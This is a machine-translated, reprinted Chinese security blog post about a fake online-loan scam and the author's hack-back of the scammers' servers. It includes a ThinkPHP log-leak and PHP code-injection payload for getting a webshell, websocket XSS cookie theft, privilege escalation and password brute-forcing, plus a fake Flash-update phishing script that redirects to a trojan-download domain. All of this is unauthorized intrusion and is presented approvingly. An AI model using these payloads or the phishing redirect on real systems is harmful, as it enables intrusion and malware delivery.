Title: Record and analyze the online loan fraud chain

0x00 Overview

One day, an online friend told the author that he was cheated. The way to be cheated is unique. Because I have no money, I choose to take a loan and was tragically scammed during the loan process.

Scam text messages

  0x01 fraud process

(The victim here is replaced by Xiaohui)

One day, Xiaohui received a text message about online loans on his mobile phone. It happened to be the end of the month and was in a tight position. Xiaohui couldn't help but temptation to download and open the app. After registering a good account, filling in your ID number, handheld, work location, family information, etc. I applied for a loan of 20,000 yuan, but it has not been received for a long time. Xiaohui asked the customer service and learned: Dear, you need to pay a VIP fee of 688 first to apply for a loan. After payment, the VIP fee will be transferred to your bank card account together with the loan amount. Xiaohui thought about it and didn't lose money, so he opened VIP treatment for the rent next month.

Xiaohui has opened VIP treatment and thought he would be able to get a loan through the end of the month, but he still did not receive the loan amount and VIP fees. This time, the customer service took the initiative to contact Xiaohui, 'Your credit limit is not enough, you need to swipe another 3,500 yuan in cash. Please pay cash to prove your repayment ability. After payment, the fee will be transferred to your bank card account together with the loan amount'.

Xiaohui was anxious. Seeing that the rent was gone next month, he gritted his teeth and borrowed 3,500 yuan from a friend and called the bank card number provided by the customer service again. He thought, you have no excuses this time! 20,000 yuan, bring it to you! Xiaohui has already thought about how to eat, drink and have fun after a loan of 20,000 yuan~~

However, the goddess of luck still did not take care of Xiaohui. The customer service contacted Xiaohui again and said that the approval had been successfully approved and the payment was about to be paid, but the cost was still 3,000 yuan, and the expenses would be transferred to the bank card account together with the loan amount. Xiaohui was stunned. Then, the customer service sent the fake contract generated by the background to Xiaohui.

Xiaohui was anxious and just took a loan, but he lost several thousand yuan and had to go to the credit report. The key loan has not been obtained yet! Seeing that the matter was getting worse and worse, Xiaohui found me. After Xiaohui's description, I checked the loan software on Xiaohui's mobile phone and told Xiaohui helplessly that you have been cheated and the money will not be returned. Xiaohui was also stunned at this moment, shed tears of regret.

ps: The above is only the real process of fraud, and all the narrations in detail add to the fire of me. The author also briefly analyzed and recorded the two common source codes of fraud on the market.

0x02 Vulnerability Analysis

1. The first set of source code vulnerability analysis

(1) Thinkphp log leak

Based on Thinkphp3.2.3 development, front-end and back-end separation

Debug is enabled by default, causing leaked log SQL information, and exception cache Construct Payload: App/Runtime/Logs/21_10_16.log

Get the leaked admin table account password and enter the background

(2) The array is controllable, causing the RCE uploadable file name to be directly brought into the data packet

Here it is guessed that the backend controls the file name in an array (it also proves that this conjecture is correct after getting the webshell)

Add the uploadable file name to php, and then upload it to get the Webshell

Check the corresponding configuration file and find that the uploadable suffix name is in the array. Here you can also use inserting a closed array to getshell

payload: siteName=11111').phpinfo();//

Let's see how the backend handles it, because of the return array, the string concatenator '.' must be added

Log in to the background to check whether Payload is executed

2. Second set of source code vulnerability analysis

(1) Customer Service Office Websocket-XSS Author has limited capabilities. The second set of fraudulent loan source code is suspected to be built with one click. They all use the latest version of Baota + Baota free version WAF, which is insufficient in obtaining permissions, so they look for breakthrough points from the customer service office.

Front desk

Find the customer service entrance, upload the image, and you will be transferred to the data package uploaded through the websocket

Modify websocket packets and construct XSS

Cookie Get

3. Customer service system control/PC control

3.1 Control database

Log in to mysql database to view fraud suspect login IP

The dynamic IP of the telecom base station in Hangzhou is judged to be a home route and has no traceability value yet.

0x03 Control customer service system

The first set of fraud source code customer service system uses the online online customer service system

I flipped into the background login address of the customer service in the background. The front-end showed that the account had an error in password, but the account was not successfully exploded.

Then the author registered the customer service system himself, traversed SetCookies through adminid and uid, and successfully exceeded his authority and obtained the customer service account.

Chinese account==

Get password for blasting

Log in to the customer service background

The entire fraudulent tactic chain

Chat history with victims

0x04 Use flash fishing

After controlling the server permissions of the fraud app, the author used flash phishing to try to control the personal PC of the fraud gang.

The file that jumps after successful login in the background is inserted and jumps to the pre-prepared fake flash update page

Prepare in advance: A fake flash domain name without killing horse (preferably containing the word 'flash')

scriptwindow.alert=function(name){var iframe=document.createElement('IFRAME');iframe.style.display='none';iframe.setAttribute('src', 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert('Your FLASH version is too low, please try to upgrade and access the page after changing it!');window.location.href='https://www.flashxxxx.com';/script effect:

Enter your account password and log in. At this time, load the above JavaScript.

Click 'Confirm' to jump to the pre-fabricated flash update page website to induce download clicks.

But it was not launched in the end. Through the log, it was found that the fraud gang logged into the backend, which is a small regret.

0x05 Summary

A typical feature of online loan fraud cases is that the suspect recruits victims who need loans under the gimmick of "no mortgage and no review", and collects a deposit in the name of "account freezing and unfreezing" to complete loans, and then charges again in the name of insurance premiums, activation fees, service fees, etc. In order to recover the money paid previously, the victim can only complete the transfer according to the entire process designed by the suspect for the victim, resulting in the victim's money being cheated. Some self-employed individuals who urgently need money, office workers with advanced consumption concepts, college students and other groups are vulnerable to fraud.

The scammers not only extend their sinful hands to Hong Kong, Taiwan, or even abroad.

According to analysis, this group of fraud gangs also committed the same fraudulent method in Brazil, and the fraud source code used is the first set of source codes analyzed above.

More than 500 victims in Brazil.

The net of heaven is vast and sparse without leaking! All those who commit evil will be severely punished by law!

Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247502166idx=1sn=3fe78999b5b43a059e66975dd185b3ccchksm=ce6463cff913ead9c3a448d7466b7c38ed593a709918265283387ad4bb787292bdd2979e7d64scene=21#wechat_redirecthttps://xz.aliyun.com/t/10391